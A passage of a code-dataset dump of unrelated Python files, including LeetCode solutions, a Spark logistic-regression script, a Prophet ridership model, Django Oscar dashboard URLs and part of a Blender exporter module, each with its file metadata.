All rights reserved.\n#----------------------------------------------------------------------------\n\nimport acm\n\nallow = acm.FUser[acm.UserName()].IsAllowed('Business Data Processing', 1)\nif allow:\n acm.UX().SessionManager().StartApplication('BDP Dashboard', None)\nelse:\n print('You need to have the permission to run Business Data Processing \\\nto launch BDP Dashboard')\n","sub_path":"Extensions/BDP/FPythonCode/BDPDashboard.py","file_name":"BDPDashboard.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"487837835","text":"from opengever.base.command import BaseObjectCreatorCommand\nfrom opengever.base.command import CreateDocumentCommand\nfrom opengever.dossier.docprops import DocPropertyWriter\nfrom opengever.dossier.dossiertemplate.dossiertemplate import BEHAVIOR_INTERFACE_MAPPING\nfrom plone.dexterity.utils import iterSchemataForType\n\n\nclass CreateDocumentFromTemplateCommand(CreateDocumentCommand):\n \"\"\"Store a copy of the template in the new document's primary file field\n \"\"\"\n\n def __init__(self, context, template_doc, title, recipient_data=tuple()):\n super(CreateDocumentFromTemplateCommand, self).__init__(\n context, template_doc.file.filename, template_doc.file.data,\n title=title)\n self.recipient_data = recipient_data\n\n def execute(self):\n obj = super(CreateDocumentFromTemplateCommand, self).execute()\n DocPropertyWriter(obj, recipient_data=self.recipient_data).initialize()\n return obj\n\n\nclass CreateDossierFromTemplateCommand(BaseObjectCreatorCommand):\n \"\"\"Creates a new dossier based on the dossiertemplate.\n \"\"\"\n portal_type = 'opengever.dossier.businesscasedossier'\n\n def __init__(self, context, template):\n kw = self._get_additional_attributes(template)\n self.fields = kw[\"IOpenGeverBase\"]\n del kw[\"IOpenGeverBase\"]\n self.additional_fields = kw\n super(CreateDossierFromTemplateCommand, self).__init__(\n context, **self.fields)\n\n def execute(self):\n obj = super(CreateDossierFromTemplateCommand, self).execute()\n schemas = iterSchemataForType(self.portal_type)\n for schema in schemas:\n schema_name = BEHAVIOR_INTERFACE_MAPPING.get(\n schema.getName(), schema.getName())\n if schema_name not in self.additional_fields:\n continue\n behavior = schema(obj)\n for prop_name in self.additional_fields[schema_name]:\n setattr(behavior, prop_name,\n self.additional_fields[schema_name][prop_name])\n return obj\n\n def _get_additional_attributes(self, template):\n \"\"\"Get all templatable attributes defined in the template.\n \"\"\"\n kw = template.get_schema_values()\n fields = {}\n for key, value in kw.items():\n schema_name, prop_name = key.split(\".\")\n if schema_name not in fields:\n fields[schema_name] = {}\n fields[schema_name][prop_name] = value\n return fields\n","sub_path":"opengever/dossier/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"413228302","text":"import sys\nfrom PyQt4.QtGui import QApplication,QDialog\nfrom PyQt4 import QtCore, QtGui\nfrom qt.liveaudio import Ui_LiveAudio\n\n# def MainWindow(QtGui.QMainWindow):\n# QtGui.QMainWindow.__init__(self)\n\n# def closeEvent(self, event):\n\ndef main(argv):\n app = QApplication(sys.argv)\n window = QtGui.QMainWindow()\n# window = MainWindow()\n if len(argv) > 1:\n ui = Ui_LiveAudio(argv[1])\n else:\n ui = Ui_LiveAudio(None)\n ui.setupUi(window)\n 
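# show the configured main window and hand control to the Qt event loop
 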
window.show()\n sys.exit(app.exec_())\n\nif __name__ == \"__main__\":\n main(sys.argv)\n","sub_path":"test_sound_only/test_sound.py","file_name":"test_sound.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"101748674","text":"\"\"\"\nhttps://leetcode.com/problems/jump-game/\nGiven an array of non-negative integers nums, you are initially positioned at the first index of the array.\n\nEach element in the array represents your maximum jump length at that position.\n\nDetermine if you are able to reach the last index.\n\n\n\nExample 1:\n\nInput: nums = [2,3,1,1,4]\nOutput: true\nExplanation: Jump 1 step from index 0 to 1, then 3 steps to the last index.\nExample 2:\n\nInput: nums = [3,2,1,0,4]\nOutput: false\nExplanation: You will always arrive at index 3 no matter what. Its maximum jump length is 0, which makes it impossible to reach the last index.\n\n\n\"\"\"\n\n\n## using recustion. Memoization Technique.\n## passed 74 test cases out of 75\n# class Solution:\n# def canJump(self, nums) -> bool:\n#\n# if nums == [0]:\n# return True\n#\n# position = 0\n# end_position = len(nums) - 1\n#\n# memo = [None] * (end_position + 1)\n# memo[end_position] = True\n#\n# return self.canJumpHelper(nums, position, end_position, memo)\n#\n# def canJumpHelper(self, nums, position, end_position, memo):\n#\n# if memo[position] is not None:\n# return memo[position]\n#\n# for i in range(1, nums[position] + 1):\n# current_position = position + i\n# if current_position <= end_position:\n# if self.canJumpHelper(nums, current_position, end_position, memo):\n# memo[position] = True\n# return memo[position]\n#\n# memo[position] = False\n# return memo[position]\n\n\n\n## Greedy Method\n##\n\"\"\"\"\nIterating right-to-left, for each position we check if there is a potential jump that reaches a GOOD index (currPosition + nums[currPosition] >= leftmostGoodIndex). If we can reach a GOOD index, then our position is itself GOOD. Also, this new GOOD position will be the new leftmost GOOD index. Iteration continues until the beginning of the array. 
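For example, with nums = [2,3,1,1,4] the leftmost GOOD index moves 4 -> 3 -> 2 -> 1 -> 0 during the right-to-left scan, so the answer is True. 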
If first position is a GOOD index then we can reach the last index from the first position.\n\n\"\"\"\n\nclass Solution:\n def canJump(self, nums) -> bool:\n n=len(nums)\n leftmostGoodIndex=n-1\n for currentPosition in range(n-1,-1,-1):\n if currentPosition+nums[currentPosition]>=leftmostGoodIndex:\n leftmostGoodIndex=currentPosition\n\n return leftmostGoodIndex==0\n\n\nobject=Solution()\n\narr=[2,3,1,1,4]\nprint(object.canJump(arr))","sub_path":"Leetcode/python/Medium/jump-game.py","file_name":"jump-game.py","file_ext":"py","file_size_in_byte":2415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"130015364","text":"class Solution:\n def longestCommonSubsequence(self, text1: str, text2: str) -> int:\n matrix = [[0 for l in range(len(text1) + 1)] for l in range(len(text2) + 1)]\n\n for i in range(1, len(matrix)):\n for j in range(1, len(matrix[0])):\n if text1[j - 1] == text2[i - 1]:\n matrix[i][j] = matrix[i - 1][j - 1] + 1\n else:\n matrix[i][j] = max(matrix[i - 1][j], matrix[i][j - 1])\n\n return matrix[-1][-1]\n\n\nif __name__ == '__main__':\n solution = Solution()\n assert solution.longestCommonSubsequence('abcde', 'ace') == 3\n assert solution.longestCommonSubsequence('abc', 'abc') == 3\n assert solution.longestCommonSubsequence('abc', 'def') == 0\n","sub_path":"1143_longest_common_subsequence.py","file_name":"1143_longest_common_subsequence.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"148270705","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Aug 19 22:46:19 2016\n\n@author: Jie\n\"\"\"\nimport pymongo\nimport requests\n\n\nurl = 'http://localhost:8080/reciter/retrieve/article/by/cwid'\n\n\ndef send_request(cwid):\n data = {'cwid': cwid}\n response = requests.get(url, data)\n print(response.json())\n\n\ndef main():\n pymongo.MongoClient(\"localhost\", 27017)\n send_request('paa2013')\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"model/retrieve_pubmed_articles.py","file_name":"retrieve_pubmed_articles.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"538301899","text":"from django.conf.urls import patterns, url\nfrom django.contrib.admin.views.decorators import staff_member_required\nfrom oscar.core.application import Application\n\nfrom oscar_accounts.dashboard import views\n\n\nclass AccountsDashboardApplication(Application):\n name = None\n default_permissions = ['is_staff', ]\n\n account_list_view = views.AccountListView\n account_create_view = views.AccountCreateView\n account_update_view = views.AccountUpdateView\n account_transactions_view = views.AccountTransactionsView\n account_freeze_view = views.AccountFreezeView\n account_thaw_view = views.AccountThawView\n account_top_up_view = views.AccountTopUpView\n account_withdraw_view = views.AccountWithdrawView\n\n transfer_list_view = views.TransferListView\n transfer_detail_view = views.TransferDetailView\n\n report_deferred_income = views.DeferredIncomeReportView\n report_profit_loss = views.ProfitLossReportView\n\n def get_urls(self):\n urlpatterns = [\n url(r'^$',\n self.account_list_view.as_view(),\n name='accounts-list'),\n url(r'^create/$', self.account_create_view.as_view(),\n name='accounts-create'),\n url(r'^(?P<pk>\d+)/update/$', self.account_update_view.as_view(),\n name='accounts-update'),\n url(r'^(?P<pk>\d+)/$', 
self.account_transactions_view.as_view(),\n name='accounts-detail'),\n url(r'^(?P<pk>\d+)/freeze/$', self.account_freeze_view.as_view(),\n name='accounts-freeze'),\n url(r'^(?P<pk>\d+)/thaw/$', self.account_thaw_view.as_view(),\n name='accounts-thaw'),\n url(r'^(?P<pk>\d+)/top-up/$', self.account_top_up_view.as_view(),\n name='accounts-top-up'),\n url(r'^(?P<pk>\d+)/withdraw/$', self.account_withdraw_view.as_view(),\n name='accounts-withdraw'),\n url(r'^transfers/$', self.transfer_list_view.as_view(),\n name='transfers-list'),\n url(r'^transfers/(?P<reference>[A-Z0-9]{32})/$',\n self.transfer_detail_view.as_view(),\n name='transfers-detail'),\n url(r'^reports/deferred-income/$',\n self.report_deferred_income.as_view(),\n name='report-deferred-income'),\n url(r'^reports/profit-loss/$',\n self.report_profit_loss.as_view(),\n name='report-profit-loss'),\n ]\n return self.post_process_urls(urlpatterns)\n\n\napplication = AccountsDashboardApplication()\n","sub_path":"source/django-oscar-accounts/src/oscar_accounts/dashboard/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"99311237","text":"from pyspark.sql import SparkSession\nfrom pyspark.ml.feature import PCA\nfrom pyspark.mllib.regression import LabeledPoint\nfrom pyspark.ml.feature import VectorAssembler\nfrom pyspark.mllib.classification import LogisticRegressionWithLBFGS,LogisticRegressionModel\nfrom pyspark.mllib.evaluation import MulticlassMetrics\nimport time\n\nstart =time.time()\n\n#create spark session\nspark = SparkSession \\\n .builder \\\n .appName(\"logistic regression\") \\\n .getOrCreate()\n\n# read training and testing data\ntrain_datafile = \"/Users/alfred/PycharmProjects/cc2/data/Train-label-28x28.csv\"\n\ntest_datafile = \"/Users/alfred/PycharmProjects/cc2/data/Test-label-28x28.csv\"\ntrain_data = spark.read.csv(train_datafile, header=False,inferSchema=\"true\")\ntest_data = spark.read.csv(test_datafile, header=False,inferSchema=\"true\")\n\n# extract features and convert to vectors.\nassembler = VectorAssembler(inputCols=train_data.columns[1:],outputCol=\"features\")\nassembler_test = VectorAssembler(inputCols=test_data.columns[1:],outputCol=\"features\")\n\ntrain_vectors = assembler.transform(train_data).select(train_data.columns[0],\"features\")\ntest_vectors = assembler_test.transform(test_data).select(test_data.columns[0],\"features\")\n\ntrain_vectors.show(2)\n\n# use PCA to reduce the dimension to 75.\npca = PCA(k=75, inputCol=\"features\",outputCol='pca')\n\nmodel = pca.fit(train_vectors)\n\npca_result = model.transform(train_vectors).select(train_vectors.columns[0],'pca')\n\npca_testresult = model.transform(test_vectors).select(test_vectors.columns[0],'pca')\n\n#transform result to rdd.\nrdd_train = pca_result.rdd\nrdd_test = pca_testresult.rdd\n\n# function to convert an rdd row to a LabeledPoint, the format required by logistic regression with LBFGS.\ndef convert(y):\n d = [x for x in y]\n return LabeledPoint(d[0],d[1:])\n\n# apply convert function to all features stored in rdd by using lambda function. \nparsed_traindata = rdd_train.map(lambda x:convert(x))\n\nparsed_testdata = rdd_test.map(lambda x:convert(x))\n\n\nprint(parsed_traindata.take(2))\n#pca_result.show(2)\n#pca_testresult.show(2)\n\nclassifier = LogisticRegressionWithLBFGS()\n\nmodel1 = classifier.train(parsed_traindata,numClasses=10)\n\n# Using lambda function to make prediction. 
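\n# Each test LabeledPoint is mapped to a (prediction, label) pair of floats,\n# which is the format MulticlassMetrics consumes below.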
\nprediciton = parsed_testdata.map(lambda p:(float(model1.predict(p.features)),p.label))\n\nend = time.time()\ntime = end-start\nprint(\"Execution time = %s\" % time)\np=prediciton.take(20)\nprint(p)\n\n# Using lambda function to calculate accurancy. \n\naccuracy = prediciton.filter(lambda lp:lp[0] ==lp[1]).count() /float(parsed_testdata.count())\n\nmetrics = MulticlassMetrics(prediciton)\n\n# performance metrics calculation.\nconfusion_matrix= metrics.confusionMatrix()\nprecision = metrics.precision()\nrecall = metrics.recall()\nf1 = metrics.fMeasure()\n\nprint(\"Execution time = %s\" %time)\nprint(\"Accuray = %s\" % accuracy)\nprint(\"Overall Precision = %s\" % precision)\nprint(\"Overall Recall = %s\" %recall)\nprint(\"F1 = %s\" %f1)\n\nprint(confusion_matrix)\n\nlabels = parsed_traindata.map(lambda lp: lp.label).distinct().collect()\nfor label in sorted(labels):\n print(\"Class %s precision = %s\" % (label, metrics.precision(label)))\n print(\"Class %s recall = %s\" % (label, metrics.recall(label)))\n print(\"Class %s F1 Measure = %s\" % (label, metrics.fMeasure(label, beta=1.0)))\n\n\nprint(\"Weighted recall = %s\" % metrics.weightedRecall)\nprint(\"Weighted precision = %s\" % metrics.weightedPrecision)\nprint(\"Weighted F(1) Score = %s\" % metrics.weightedFMeasure())\nprint(\"Weighted F(0.5) Score = %s\" % metrics.weightedFMeasure(beta=0.5))\nprint(\"Weighted false positive rate = %s\" % metrics.weightedFalsePositiveRate)\n\nprediciton.saveAsTextFile(\"/Users/alfred/PycharmProjects/demo/t28\")\n","sub_path":"logistic regression.py","file_name":"logistic regression.py","file_ext":"py","file_size_in_byte":3665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"68953446","text":"import cv2\r\nimport numpy as np\r\nimport os\r\nimport colorsys\r\nimport copy\r\ndef disRGBimg(img,c2):\r\n img=img[::-1,:,:].astype(np.float32)\r\n for i in range(3):\r\n img[i,:,:]=(img[i,:,:]-c2[i])*(img[i,:,:]-c2[i])\r\n #print('np.max(img),np.min(img)',np.max(img),np.min(img))\r\n return (255-np.sqrt(np.sum(img,axis=0)/(3*255*255))*255).astype('uint8')\r\ndef dis_stack_img(img,c2):\r\n #img=img[::-1,:,:].astype(np.float32)\r\n for i in range(6):\r\n img[i,:,:]=(img[i,:,:]-c2[i])*(img[i,:,:]-c2[i])\r\n #print('np.max(img),np.min(img)',np.max(img),np.min(img))\r\n return (255-np.sqrt(np.sum(img,axis=0)/(3*255*255))*255).astype('uint8')\r\n \r\ndef pencentile_and_pool(i, dis, percent,prefix,save_visual,naip_slice,patch_file,fore_ground,back_ground):\r\n visual_folder='/mnt/blobfuse/train-output/ByMZ/high_res_20back'\r\n color_iter_distance=[59.38414365, 47.0623548, 68.98451365, 61.70322829, 47.0623548 ]\r\n if not os.path.exists(visual_folder):\r\n os.makedirs(visual_folder)\r\n p=np.percentile(dis,percent)\r\n if prefix=='background':\r\n p=np.max((p,255-30))\r\n else:\r\n p=np.max((p,255-color_iter_distance[int(i/2)])) #35=np.sqrt(20^2+20^2+20^2)\r\n print('i',i,'p',p)\r\n s,dis_bi=cv2.threshold(dis,p,255,cv2.THRESH_BINARY)\r\n kernel=np.ones((3,3))\r\n dis_ero=cv2.dilate(dis_bi,kernel,iterations=1)\r\n if prefix=='background':\r\n dis_ero=cv2.erode(dis_ero,kernel,iterations=9)\r\n else:\r\n dis_ero=cv2.erode(dis_ero,kernel,iterations=2)\r\n dis_ero=(dis_ero>0).astype('uint8')\r\n \r\n \r\n pooled=self.maxpool(dis_ero,self.unet_level)\r\n pooled=pooled+back_ground\r\n pooled_bi=(pooled>0).astype('uint8')\r\n pooled_bi=pooled_bi-fore_ground\r\n pooled_bi=(pooled_bi>0).astype('uint8')\r\n \r\n \r\n 
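# NOTE: self.maxpool, self.expand_output_mao, self.unet_level and self.save_visual\r\n # refer to the class this helper was copied out of; as a module-level function it\r\n # needs those attributes supplied by an enclosing class (or passed in) to run.\r\n 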
pooled_bi_expand=self.expand_output_mao(pooled_bi*255,self.unet_level)\r\n naip_slice1=np.swapaxes(naip_slice,0,2)\r\n naip_slice1=np.swapaxes(naip_slice1,0,1)\r\n \r\n if self.save_visual==1:\r\n cv2.imwrite(os.path.join(visual_folder,os.path.basename(patch_file)+prefix+'_'+'dis_bi'+str(int(i/2))+'.png'),dis_bi)\r\n cv2.imwrite(os.path.join(visual_folder,os.path.basename(patch_file)+prefix+'_'+'dis_ero'+str(int(i/2))+'.png'),dis_ero*255)\r\n cv2.imwrite(os.path.join(visual_folder,os.path.basename(patch_file)+prefix+'_'+'pooled_bi'+str(int(i/2))+'.png'),pooled_bi_expand)\r\n\r\n if not os.path.exists(os.path.join(visual_folder,os.path.basename(patch_file)+prefix+'_'+'ori.png')):\r\n cv2.imwrite(os.path.join(visual_folder,os.path.basename(patch_file)+prefix+'_'+'ori.png'),(naip_slice1*255).astype('uint8'))\r\n return pooled_bi\r\n \r\n#####color extraction\r\nstain_OD=np.array([[82.60197,90.8649,98.27977],[14.87054,138.48598,65.88664],[ 17.725187,24.566036,76.55223],[116.36674,16.986359, 12.227117],[35.247486,82.52399,34.31515]])\r\nstain_RGB=np.exp(-stain_OD*np.log(255)/255)*255-1\r\nIHC_OD=np.array([26.784452,20.88244,14.707071])\r\nIHC_RGB=np.exp(-IHC_OD*np.log(255)/255)*255-1\r\n\r\n\r\nsave_folder='./color_L2/'\r\nif not os.path.exists(save_folder):\r\n os.makedirs(save_folder)\r\ncolor_name=['CD16 dark brown','CD20 pink','CD3 yellow', 'CD4 cyan','CD8 purple']\r\ninputfolder='./test_color_L2/'\r\nimname='1475_1.0_0.0_0.0_1.0_1.0_0.0_1.0_0.0_1.0_0.0.npyforeground_ori.png'\r\n#\r\n\r\nfor i in range(5):\r\n \r\n \r\n #print('img.shape',img.shape)\r\n #print('stain_RGB[i/2,:]',stain_RGB[int(i/2),:])\r\n img=cv2.imread(os.path.join(inputfolder,imname))\r\n #img=np.transpose(img)\r\n #\r\n print(img.shape)\r\n #dis=colorsys.rgb_to_hsv(img[2,:,:]/255.0,img[1,:,:]/255.0,img[0,:,:]/255.0)\r\n img[0,0,2]=stain_RGB[i,0]\r\n img[0,0,1]=stain_RGB[i,1]\r\n img[0,0,0]=stain_RGB[i,2]\r\n dis = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\r\n dis=np.transpose(dis)\r\n hsv=copy.deepcopy(dis)\r\n dis=disRGBimg(dis,[dis[2,0,0],dis[1,0,0],dis[0,0,0]])\r\n dis=np.transpose(dis)\r\n \r\n img=np.transpose(img)\r\n rgb=copy.deepcopy(img)\r\n disrgb=disRGBimg(img,stain_RGB[i])\r\n disrgb=np.transpose(disrgb)\r\n \r\n #dis_IHC=disRGBimg(img,IHC_RGB)\r\n \r\n stack=np.zeros((6,rgb.shape[1],rgb.shape[2]))\r\n stack[0:3,:,:]=rgb[::-1,:,:]\r\n stack[3:6,:,:]=hsv[::-1,:,:]\r\n color_stack=np.zeros((6))\r\n color_stack[0:3]=stain_RGB[i]\r\n color_stack[3:6]=np.array([hsv[2,0,0],hsv[1,0,0],hsv[0,0,0]])\r\n dis_stack=dis_stack_img(stack,color_stack)\r\n dis_stack=np.transpose(dis_stack)\r\n print(np.max(dis),np.min(dis))\r\n cv2.imwrite(os.path.join(save_folder,imname[0:-4]+color_name[i]+'_hsv.png'),dis.astype('uint8'))\r\n cv2.imwrite(os.path.join(save_folder,imname[0:-4]+color_name[i]+'_rgb.png'),disrgb.astype('uint8'))\r\n cv2.imwrite(os.path.join(save_folder,imname[0:-4]+color_name[i]+'_stack.png'),dis_stack.astype('uint8'))\r\n ","sub_path":"training_phase/color_conversion_deconve_L2dis/color_extraction_for_labeling.py","file_name":"color_extraction_for_labeling.py","file_ext":"py","file_size_in_byte":5078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"26698815","text":"from datetime import datetime\nfrom fbprophet import Prophet\nimport pandas as pd\nfrom util import Util\n\nclass RidershipModel:\n\n def __init__(self,field):\n # self._training_data = training_data\n self.init_holidays()\n self._model = Prophet(daily_seasonality=True, weekly_seasonality=True, 
holidays=self._holidays)\n self._model.add_country_holidays(country_name=\"PH\")\n self._field = field\n\n\n def init_holidays(self):\n dates = []\n start = datetime(2019,4,15,0,0)\n end = datetime(2019,4,22,0,0)\n date = start\n while date < end:\n dates.append(date)\n date = Util.get_next_hour(date,1)\n self._holidays = pd.DataFrame({\n 'holiday': 'holy week',\n 'ds': pd.to_datetime(dates),\n 'lower_window': 0,\n 'upper_window': 0\n })\n\n def add_holidays(self,holidays):\n if 'ds' not in holidays.columns:\n holidays['ds'] = holidays.index\n self._holidays = self._holidays.append(holidays)\n\n def fit(self,data):\n self._model.fit(self.prep_data(data))\n\n\n def prep_data(self,data,training=True):\n new_df = data.copy()\n if 'ds' not in new_df.columns:\n new_df['ds'] = data.index\n if training:\n new_df['y'] = data[self._field]\n return new_df\n\n\n def predict_indiv(self,date):\n predict_df = pd.DataFrame(data=[date], columns=[\"ds\"])\n return self.prep_predict(self._model.predict(predict_df))\n\n def predict(self,df):\n return self.prep_predict(self._model.predict(self.prep_data(df,False)))\n\n def predict_steps(self,steps):\n predict_df = self._model.make_future_dataframe(periods=steps,freq='h',include_history=False)\n return self.prep_predict(self._model.predict(predict_df))\n\n\n def prep_predict(self, prediction):\n pred_df = prediction.merge(self._holidays, left_on='ds', right_on='ds', how='left').fillna(0)\n pred_df.loc[pred_df['holiday'] != 0, 'prediction'] = 0\n pred_df.loc[pred_df['holiday'] == 0, 'prediction'] = pred_df[pred_df['holiday'] == 0]['yhat']\n return pred_df\n","sub_path":"ml_model/ridership_model.py","file_name":"ridership_model.py","file_ext":"py","file_size_in_byte":2135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"642025375","text":"## A program that determines if a string is a palindrome ##\n\n# Prompting input from the user, converting string to lowercase characters, and\n# determining the word length\nentry = input(\"Enter a word: \")\nword = entry.lower()\nword_length = len(word)\n# Checking if a word has an even or odd number of letters and determining half\n# the number of letters in half of the word (either side of the middle letter\n# for an odd-length word)\n\nif word_length % 2 == 0: # even\n half_word = int(word_length / 2)\nelse: # odd\n half_word = int((word_length - 1) / 2)\n\n# Initializing palindrome to True\npalindrome = True\n\n# Comparing each letter working from the outside in. As soon as a pair of\n# letters differs, the word cannot be a palindrome and we can stop checking.\nfor i in range(0, half_word):\n if word[i] != word[len(word)-(i+1)]:\n palindrome = False\n break\n\n# Displaying output\nif palindrome:\n print(\"\\\"%s\\\" is a palindrome\" % entry)\nelse:\n print(\"\\\"%s\\\" is not a palindrome\" % entry)\n","sub_path":"3 Loop exercises/Ex_72.py","file_name":"Ex_72.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"}
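For reference, the letter-pairing check above can be written much more compactly with slicing; a minimal sketch (the helper name is ours, not part of the original exercise):

def is_palindrome(text):
    # a word is a palindrome exactly when it equals its own reverse
    word = text.lower()
    return word == word[::-1]

print(is_palindrome("Level"))   # True
print(is_palindrome("Planet"))  # False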
 +{"seq_id":"453836582","text":"\"\"\"\nInterval Sum\nAssume an infinitely long number line on which the number at every coordinate starts as 0.\n\nFirst we perform n operations; each operation adds c to the number at some position x.\n\nThen we make m queries; each query contains two integers l and r, and asks for the sum of all numbers in the interval [l, r].\n\nInput format\nThe first line contains the two integers n and m.\n\nThe next n lines each contain two integers x and c.\n\nThe following m lines each contain two integers l and r.\n\nOutput format\nm lines, each printing the interval sum requested by one query.\n\nData range\n−10^9 ≤ x ≤ 10^9,\n1 ≤ n,m ≤ 10^5,\n−10^9 ≤ l ≤ r ≤ 10^9,\n−10000 ≤ c ≤ 10000\nSample input:\n3 3\n1 2\n3 6\n7 5\n1 3\n4 6\n7 8\nSample output:\n8\n0\n5\n\n1. Map every coordinate onto the discretized (sorted, de-duplicated) array\n\"\"\"\nn, m = map(int, input().split())\nN = 100000 # upper bound on n and m\nadd = [] # stores the (x, c) pairs of the insert operations\nquery = [] # stores the (l, r) pairs of the queries\nalls = [] # stores every coordinate used by inserts and queries, giving the mapping alls[index] = x\nA = [0] * (N * 3 + 10) # alls holds at most n + 2 * m coordinates\nS = [0] * (N * 3 + 10) # the prefix-sum array has to match the size of A\n\n\n# binary search for the 1-based discretized index of coordinate x\ndef find(x):\n l = 0\n r = len(alls) - 1\n while l < r:\n mid = l + r + 1 >> 1\n if alls[mid] >= x:\n r = mid - 1\n else:\n l = mid\n return l + 1 # add 1 so indices start at 1 for the prefix sums => S[1] = S[0] + A[1]\n\n\nif __name__ == '__main__':\n for i in range(n):\n x, c = map(int, input().split())\n add.append((x, c))\n alls.append(x)\n\n for j in range(m):\n l, r = map(int, input().split())\n query.append((l, r))\n alls.append(l)\n alls.append(r)\n\n # 1. build the mapping - de-duplicate and sort alls\n alls = list(sorted(set(alls)))\n\n # 2. apply the insert operations\n for x, c in add:\n index = find(x)\n A[index] += c\n\n # 3. compute the prefix sums\n for i in range(1, len(alls) + 1):\n S[i] = S[i - 1] + A[i]\n\n # 4. answer each query over l ~ r with the prefix sums => S[index_r] - S[index_l - 1]\n for l, r in query:\n print(S[find(r)] - S[find(l) - 1])","sub_path":"2021/Algorithm/Python/Base/1_basic_algorithm/802.py","file_name":"802.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"zh","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"71704333","text":"# This file is part of Korman.\n#\n# Korman is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# Korman is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with Korman. If not, see <http://www.gnu.org/licenses/>.\n\nimport bpy\nfrom PyHSPlasma import *\nfrom math import fabs\nimport weakref\n\nfrom ..exporter.logger import ExportProgressLogger\nfrom . import explosions\nfrom .. import helpers\nfrom . import material\nfrom . 
import utils\n\n_MAX_VERTS_PER_SPAN = 0xFFFF\n_WARN_VERTS_PER_SPAN = 0x8000\n\n_VERTEX_COLOR_LAYERS = {\"col\", \"color\", \"colour\"}\n\nclass _RenderLevel:\n MAJOR_OPAQUE = 0\n MAJOR_FRAMEBUF = 1\n MAJOR_DEFAULT = 2\n MAJOR_BLEND = 4\n MAJOR_LATE = 8\n\n _MAJOR_SHIFT = 28\n _MINOR_MASK = ((1 << _MAJOR_SHIFT) - 1)\n\n def __init__(self, bo, hsgmat, pass_index, blendSpan=False):\n self.level = 0\n\n if blendSpan:\n self.major = self.MAJOR_DEFAULT\n\n # We use the blender material's pass index (which we stashed in the hsGMaterial) to increment\n # the render pass, just like it says...\n self.level += pass_index\n\n def __eq__(self, other):\n return self.level == other.level\n\n def __hash__(self):\n return hash(self.level)\n\n def _get_major(self):\n return self.level >> self._MAJOR_SHIFT\n def _set_major(self, value):\n self.level = ((value << self._MAJOR_SHIFT) & 0xFFFFFFFF) | self.minor\n major = property(_get_major, _set_major)\n\n def _get_minor(self):\n return self.level & self._MINOR_MASK\n def _set_minor(self, value):\n self.level = ((self.major << self._MAJOR_SHIFT) & 0xFFFFFFFF) | value\n minor = property(_get_minor, _set_minor)\n\n\nclass _DrawableCriteria:\n def __init__(self, bo, hsgmat, pass_index):\n self.blend_span = bool(hsgmat.layers[0].object.state.blendFlags & hsGMatState.kBlendMask)\n self.criteria = 0\n\n if self.blend_span:\n for mod in bo.plasma_modifiers.modifiers:\n if mod.requires_face_sort:\n self.criteria |= plDrawable.kCritSortFaces\n if mod.requires_span_sort:\n self.criteria |= plDrawable.kCritSortSpans\n self.render_level = _RenderLevel(bo, hsgmat, pass_index, self.blend_span)\n\n def __eq__(self, other):\n if not isinstance(other, _DrawableCriteria):\n return False\n for i in (\"blend_span\", \"render_level\", \"criteria\"):\n if getattr(self, i) != getattr(other, i):\n return False\n return True\n\n def __hash__(self):\n return hash(self.render_level) ^ hash(self.blend_span) ^ hash(self.criteria)\n\n @property\n def span_type(self):\n if self.blend_span:\n return \"BlendSpans\"\n else:\n return \"Spans\"\n\n\nclass _GeoData:\n def __init__(self, numVtxs):\n self.blender2gs = [{} for i in range(numVtxs)]\n self.triangles = []\n self.vertices = []\n\n\n\nclass _MeshManager:\n def __init__(self, report=None):\n if report is not None:\n self._report = report\n self._overrides = {}\n\n @staticmethod\n def add_progress_presteps(report):\n report.progress_add_step(\"Applying Blender Mods\")\n\n def _build_prop_dict(self, bstruct):\n props = {}\n for i in bstruct.bl_rna.properties:\n ident = i.identifier\n if ident == \"rna_type\":\n continue\n props[ident] = getattr(bstruct, ident) if getattr(i, \"array_length\", 0) == 0 else tuple(getattr(bstruct, ident))\n return props\n\n def __enter__(self):\n scene = bpy.context.scene\n self._report.progress_advance()\n self._report.progress_range = len(scene.objects)\n\n # Some modifiers like \"Array\" will procedurally generate new geometry that will impact\n # lightmap generation. The Blender Internal renderer does not seem to be smart enough to\n # take this into account. 
